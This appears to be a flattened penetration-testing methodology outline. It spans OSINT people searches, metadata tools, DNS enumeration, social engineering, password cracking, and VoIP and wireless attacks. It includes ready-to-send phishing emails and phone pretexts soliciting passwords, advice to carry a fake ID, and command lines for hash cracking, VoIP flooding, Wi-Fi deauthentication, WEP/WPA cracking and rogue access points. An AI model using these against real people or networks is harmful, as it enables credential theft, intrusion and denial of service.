BT.com. UK

Residential Business

Pipl

http://pipl.com/search/?FirstName=????&LastName=????&City=&State=&Country=UK&CategoryID=2&Interface=1 http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1 http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

Spokeo

http://www.spokeo.com/user?q=domain_name http://www.spokeo.com/user?q=email_address

Yasni

http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

Zabasearch

People Search Engine. US

Generic Web Searching

Code Search Forum Entries Google Hacking Database Google

Back end files

.exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

Email Addresses Contact Details

Newsgroups/forums Blog Search

Yammer Google Blog Search

Technorati

http://technorati.com/search/[query]?language=n

Jaiku Present.ly Twitter Network Browser

Search Engine Comparison/ Aggregator Sites
Clusty

http://clusty.com/search?input-form=clusty-simple&v%3Asources=webplus&query=????

Grokker

http://live.grokker.com/grokker.html?query=?????&OpenSearch_Yahoo=true&Wikipedia=true&numResults=250

Zuula

http://www.zuula.com/SearchResult.jsp?bst=1&prefpg=1&st=????&x=0&y=0

Exalead

http://www.exalead.co.uk/search/results?q=????&x=0&y=0&%24mode=allweb&%24searchlanguages=en

Delicious

http://delicious.com/search?p=?????&u=&chk=&context=&fr=del_icio_us&lc=0

Metadata Search

Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.
MetaData Visualisation Sites

TouchGraph Google Browser Kartoo

Tools
Bashitsu

svn checkout http://bashitsu.googlecode.com/svn/trunk/ cat filename | strings | bashitsu-extract-names

Bintext Exif Tool

exiftool -common directory exiftool -r -w .txt -common directory

FOCA

Online Version Offline

Hachoir Infocrobes Libextractor

extract -b filename extract filename extract -B country_code filename

Metadata Extraction Tool

extract.bat <arg1> <arg2> <arg3>

Metagoofil

metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to

OOMetaExtractor The Revisionist

./therev ‘’ @/directory ./therev ‘’ site.com ./therev ‘linux’ microsoft.com en

Wvware

Wikipedia Metadata Search

Wikiscanner Wikipedia username checker

Social/ Business Networks

The following sites are some of many social and business related networking entities that are in use today. Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc.

Finding a persons particular interests may make a potential client side attack more successful if you can find a related “hook” in any potential “spoofed” email sent for them to click on (A Spearphishing technique)

Note: - This list is not exhaustive and has been limited to those with over 1 million members.
Africa

BlackPlanet

Australia

Bebo

Belgium

Netlog

Holland

Hyves

Hungary

iWiW

Iran

Cloob

Japan

Mixi

Korea

CyWorld

Poland

Grono Nasza-klasa

Russia

Odnoklassniki Vkontakte

Sweden

LunarStorm

UK

FriendsReunited et al Badoo FaceParty

US

Classmates Facebook Friendster MyLife.com (formerly Reunion.com) MySpace Windows Live Spaces

Assorted

Buzznet Care2 Habbo Hi5 Linkedin MocoSpace Naymz Orkut Passado Tagged Twitter Windows Live Spaces Xanga Yahoo! 360° Xing

Resources

OSINT International Directory of Search Engines

DNS Record Retrieval from publically available servers
Types of Information Records

SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.

Database Settings

Version.bind Serial Refresh Retry Expiry Minimum

Sub Domains Internal IP ranges

Reverse DNS for IP Range

Zone Transfer

Social Engineering
Remote
Phone
Scenarios

IT Department.”Hi, it’s Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays”If you are calling from a mobile number, explain that the helpdesk has beenissued a mobile phone for ‘on call’ personnel.

Results Contact Details

Name Phone number Email Room number Department Role

Email
Scenarios

Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then populate thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere-established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, Andrew Marks Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.Kindest regards,leeEMAIL SIGNATURE

Software Results Contact Details

Name Phone number Email Room number Department Role

Other

Local
Personas
Name

Suggest same 1st name.

Phone

Give work mobile, but remember they have it!

Email

Have a suitable email address

Business Cards

Get cards printed

Contact Details

Name Phone number Email Room number Department Role

Scenarios
New IT employee

New IT employee.”Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”Get the following information, try to put a “any problems with it we can help with?” slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used software?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure.”Thanks very much and you’ll see the results on the company boards soon.”

Fire Inspector

Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision!

Results Maps

Satalitte Imagery

Google Maps

Building layouts

Other

Dumpster Diving

Rubbish Bins Contract Waste Removal Ebay ex-stock sales i.e. HDD

Web Site copy

htttrack teleport pro Black Widow

Password cracking

Rainbow crack

ophcrack rainbow tables

rcrack c:rainbowcrack*.rt -f pwfile.txt

Ophcrack Cain & Abel John the Ripper

./unshadow passwd shadow > file_to_crack ./john -single file_to_crack ./john -w=location_of_dictionary_file -rules file_to_crack ./john -show file_to_crack ./john –incremental:All file_to_crack

fgdump

fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

pwdump6

pwdump [-h][-o][-u][-p] machineName

medusa LCP L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

Domain credentials Sniffing pwdump import sam import

aiocracker

aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

VoIP Security

Sniffing Tools

AuthTool Cain & Abel Etherpeek NetDude Oreka PSIPDump SIPomatic SIPv6 Analyzer UCSniff VoiPong VOMIT Wireshark WIST - Web Interface for SIP Trace

Scanning and Enumeration Tools

enumIAX fping IAX Enumerator iWar Nessus Nmap SIP Forum Test Framework (SFTF) SIPcrack sipflanker

python sipflanker.py 192.168.1-254

SIP-Scan SIP.Tastic SIPVicious SiVuS SMAP

smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

snmpwalk VLANping VoIPAudit VoIP GHDB Entries VoIP Voicemail Database

Packet Creation and Flooding Tools

H.323 Injection Files H225regreject IAXHangup IAXAuthJack IAX.Brute IAXFlooder

./iaxflood sourcename destinationname numpackets

INVITE Flooder

./inviteflood interface target_user target_domain ip_address_target no_of_packets

kphone-ddos RTP Flooder rtpbreak Scapy Seagull SIPBomber SIPNess SIPp SIPsak

Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

SIP-Send-Fun SIPVicious Spitter TFTP Brute Force

perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

UDP Flooder

./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

UDP Flooder (with VLAN Support)

./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

Voiphopper

Fuzzing Tools

Asteroid Codenomicon VoIP Fuzzers Fuzzy Packet Mu Security VoIP Fuzzing Platform ohrwurm RTP Fuzzer PROTOS H.323 Fuzzer PROTOS SIP Fuzzer SIP Forum Test Framework (SFTF) Sip-Proxy Spirent ThreatEx

Signaling Manipulation Tools
AuthTool

./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

BYE Teardown Check Sync Phone Rebooter RedirectPoison

./redirectpoison interface target_source_ip target_source_port “<contact_information i.e. sip:100.77.50.52;line=xtrfgy>”

Registration Adder Registration Eraser Registration Hijacker SIP-Kill SIP-Proxy-Kill SIP-RedirectRTP SipRogue vnak

Media Manipulation Tools
RTP InsertSound

./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

RTP MixSound

./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

RTPProxy RTPInject

Generic Software Suites

OAT Office Communication Server Tool Assessment EnableSecurity VOIPPACK

Note: - Add-on for Immunity Canvas

References
URL’s
Common Vulnerabilities and Exploits (CVE)

Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

Default Passwords Hacking Exposed VoIP

Tool Pre-requisites

Hack Library g711conversions

VoIPsa

White Papers

An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

Vulnerability Assessment

Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
Manual

Patch Levels Confirmed Vulnerabilities

Severe High Medium Low

Automated

Reports Vulnerabilities

Severe High Medium Low

Tools

GFI Nessus (Linux)

Nessus (Windows)

NGS Typhon NGS Squirrel for Oracle NGS Squirrel for SQL SARA MatriXay BiDiBlah SSA Oval Interpreter Xscan Security Manager + Inguma

Resources

Security Focus Microsoft Security Bulletin Common Vulnerabilities and Exploits (CVE) National Vulnerability Database (NVD) The Open Source Vulnerability Database (OSVDB)

Standalone Database

Update URL

United States Computer Emergency Response Team (US-CERT) Computer Emergency Response Team Mozilla Security Information SANS Securiteam PacketStorm Security Security Tracker Secunia Vulnerabilities.org ntbugtraq Wireless Vulnerabilities and Exploits (WVE)

Blogs

Carnal0wnage Fsecure Blog g0ne blog GNUCitizen ha.ckers Blog Jeremiah Grossman Blog Metasploit nCircle Blogs pentest mokney.net Rational Security Rise Security Security Fix Blog Software Vulnerability Exploitation Blog Taosecurity Blog

Wireless Penetration

Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
Site Map
RF Map

Lines of Sight Signal Coverage

Standard Antenna Directional Antenna

Physical Map

Triangulate APs Satellite Imagery

Network Map
MAC Filter

Authorised MAC Addresses Reaction to Spoofed MAC Addresses

Encryption Keys utilised
WEP
Key Length

Crack Time Key

WPA/PSK
TKIP
Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP

Key Attack Time

AES
Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data.

Key Attack Time

802.1x

Derivative of 802.1x in use

Access Points
ESSID
Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point

Broadcast ESSIDs

BSSIDs
Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks.

Vendor Channel Associations Rogue AP Activity

Wireless Clients
MAC Addresses

Vendor Operating System Details Adhoc Mode Associations

Intercepted Traffic

Encrypted Clear Text

Wireless Toolkit
Wireless Discovery

Aerosol Airfart Aphopper Apradar BAFFLE karma Kismet MiniStumbler Netstumbler Wellenreiter Wifi Hopper WirelessMon

Packet Capture

Airopeek Airtraf Apsniff Cain Wireshark

EAP Attack tools
eapmd5pass

eapmd5pass -w dictionary_file -r eapmd5-capture.dump

eapmd5pass -w dictionary_file -U username -C EAP-MD5 Challengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e. -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2

Leap Attack Tools

asleap thc leap cracker anwrap

WEP/ WPA Password Attack Tools

Aircrack-ptw Aircrack-ng Airsnort cowpatty wep attack wep crack Airbase wzcook

Frame Generation Software

Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap

wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

FreeRADIUS - Wireless Pwnage Edition

Mapping Software

Knsgem

File Format Conversion Tools

ns1 recovery and conversion tool warbable warkizniz

warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

ivstools

IDS Tools

WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

WLAN discovery
Unencrypted WLAN
Visible SSID
Sniff for IP range

MAC authorised MAC filtering

Spoof valid MAC
Linux

ifconfig [interface] hw ether [MAC]

macchanger

Random Mac Address:- macchanger -r eth0

mac address changer for windows madmacs TMAC SMAC

Hidden SSID
Deauth client
Aireplay-ng

aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

Commview

Tools > Node reassociation

Void11

void11_penetration wlan0 -D -t 1 -B [MAC]

WEP encrypted WLAN
Visible SSID
WEPattack
wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]
Capture / Inject packets
Break WEP
Aircrack-ptw

aircrack-ptw [pcap file]

Aircrack-ng

aircrack -q -n [WEP key length] -b [BSSID] [pcap file]

Airsnort

Channel > Start

WEPcrack

perl WEPCrack.pl ./pcap-getIV.pl -b 13 -i wlan0

Hidden SSID
Deauth client
Aireplay-ng

aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

Commview

Tools > Node reassociation

Void11

void11_hopper void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

WPA / WPA2 encrypted WLAN
Deauth client
Capture EAPOL handshake
WPA / WPA 2 dictionary attack
coWPAtty

./cowpatty -r [pcap file] -f [wordlist] -s [SSID] ./genpmk -f dictionary_file -d hashfile_name -s ssid ./cowpatty -r cature_file.cap -d hashfile_name -s ssid

Aircrack-ng

aircrack-ng -a 2 -w [wordlist] [pcap file]

LEAP encrypted WLAN
Deauth client
Break LEAP
asleap

./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx ./genkeys -r dictionary_file -f output_pass+hash file.dat -n output_index_filename.idx

THC-LEAPcracker

leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]

802.1x WLAN
Create Rogue Access Point
Airsnarf
Deauth client
Associate client
Compromise client
Acquire passphrase / certificate

wzcook Obtain user’s certificate

fake ap

perl fakeap.pl –interface wlan0 perl fakeap.pl –interface wlan0 –channel 11 –essid fake_name –wep 1 –key [WEP KEY]

Hotspotter
Deauth client
Associate client
Compromise client
Acquire passphrase / certificate

wzcook Obtain user’s certificate

Karma
Deauth client
Associate client
Compromise client
Acquire passphrase / certificate

wzcook Obtain user’s certificate

./bin/karma etc/karma-lan.xml

Linux rogue AP
Deauth client
Associate client
Compromise client
Acquire passphrase / certificate

wzcook Obtain user’s certificate

Resources
URL’s

Wirelessdefence.org Russix Wardrive.net Wireless Vulnerabilities and Exploits (WVE)

White Papers

Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices

Common Vulnerabilities and Exploits (CVE)

Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

Penetration

Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
Password Attacks
Known Accounts

Identified Passwords Unidentified Hashes

Default Accounts

Identified Passwords Unidentified Hashes

Exploits
Successful Exploits
Accounts
Passwords

Cracked Uncracked

Groups Other Details

Services Backdoor Connectivity

Unsuccessful Exploits Resources

Securiteam

Exploits are sorted by year and must be downloaded individually

SecurityForest

Updated via CVS after initial install

GovernmentSecurity

Need to create and account to obtain access

Red Base Security

Oracle Exploit site only

Wireless Vulnerabilities & Exploits (WVE)

Wireless Exploit Site

PacketStorm Security

Exploits downloadable by month and year but no indexing carried out.

SecWatch

Exploits sorted by year and month, download seperately

SecurityFocus

Exploits must be downloaded individually

Metasploit

Install and regualrly update via svn

Milw0rm

Exploit archived indexed and sorted by port download as a whole - The one to go for!

Tools
Metasploit
Free Extra Modules

local copy

Manual SQL Injection

Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets

SQL Power Injector SecurityForest SPI Dynamics WebInspect Core Impact Cisco Global Exploiter PIXDos

perl PIXdos.pl [ –device=interface ] [–source=IP] [–dest=IP] [–sourcemac=M AC] [–destmac=MAC] [–port=n]

CANVAS Inguma